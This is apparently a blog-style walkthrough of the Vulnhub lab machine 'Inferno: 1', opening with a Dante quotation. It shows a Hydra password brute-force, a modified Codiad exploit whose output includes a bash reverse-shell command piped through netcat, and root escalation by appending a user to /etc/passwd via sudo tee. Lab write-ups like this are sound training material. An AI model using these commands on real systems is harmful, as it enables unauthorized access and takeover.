Real Life machine vs CTF.

Midway upon the journey of our life I found myself within a forest dark,
For the straightforward pathway had been lost.
Ah me! how hard a thing it is to say
What was this forest savage, rough, and stern,
Which in the very thought renews the fear.

Sidenote: the quote above is from Inferno, Canto I by Dante Alighieri, part of the Divine Comedy. As I read it, it is basically the same as the introduction to one of my favourite Alkaline Trio songs, I Found Away:

Midway on our life’s journey, I found myself
In dark woods, the right road lost. To tell
About those woods is hard - so tangled and rough
And savage that thinking of it now, I feel
The old fear stirring….

This is Inferno: 1 from Vulnhub.


This box was using port spoofing and reported having 1147 open ports. Yuck. I assumed there was a website; there was.


It doesn’t take much gobusting to find our target; the directory we want is /inferno/. It’s protected by basic authentication, but we can Hydra that:

root@kali:/opt/vulnhub/inferno# hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt http-get /inferno/
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2020-12-04 05:21:35
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://
[STATUS] 8009.00 tries/min, 8009 tries in 00:01h, 14336390 to do in 29:51h, 16 active
[80][http-get] host:   login: admin   password: dante1
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2020-12-04 05:23:29


The site is running Codiad, a sort of in browser IDE that I hadn’t seen before. It looks pretty neat but it’s now unmaintained and there is an exploit available.

I had to make a few changes to the exploit code it get it running, which was mostly adding the basic authentication header to the network calls; there were three of them. As an example, this is what the get_write_able_path function became:

def get_write_able_path(domain):
    global session
    url = domain + "/components/project/controller.php?action=get_current"
    headers = {
        "Authorization": "Basic YWRtaW46ZGFudGUx"
    response = session.get(url, verify=False, headers=headers)
    content = response.content
    print "[+] Path Content : %s" % (content)
    json_obj = json.loads(content)
    # print(json_obj) # debug
    if json_obj['status'] == "success":
        return json_obj['data']['path']
        return False

And once the code modifications were made, we could get a shell:

root@kali:/opt/vulnhub/inferno# ./ admin dante1 1234 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/ 0>&1 2>&1"' | nc -lnvp 1234
nc -lnvp 1235
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...


After that I was on the box as www-data, and we only had one user with a home directory - dante. He’s got a file we can read:

www-data@Inferno:/home/dante/Downloads$ file download.dat
file download.dat
download.dat: ASCII text, with very long lines, with no line terminators
4.0K -rw-r--r--  1 www-data www-data 1.5K Nov  3 11:52 download.dat

This is a space-delimited hex encoded file that contains some verse, and some creds:


SSH + Privesc

Remember the port spoofing and how I got lucky with the webserver on port 80? Well, SSH was on the standard port too, and dante had sudo access to tee. tee reads from standard input and writes to a file, so I added my favourite root2 user with the password mrcake to /etc/passwd. This is slightly different to what GTFOBins suggested, but the concept is the same. Enjoy:

root@kali:/opt/vulnhub/inferno# ssh dante@
The authenticity of host ' (' cant be established.
ECDSA key fingerprint is SHA256:5eMSIG2JrA2xEfQlgC7P3KruDMWuL5zBOhcYqj1nefg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
dante@ password: 
Linux Inferno 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Nov 17 07:45:38 2020 from
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /bin/tee
dante@Inferno:~$ sudo -u root /bin/tee -a /etc/passwd
dante@Inferno:~$ su root2
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
root@Inferno:~# cat proof.txt 



Youve rooted Inferno!

Thanks mindsflee.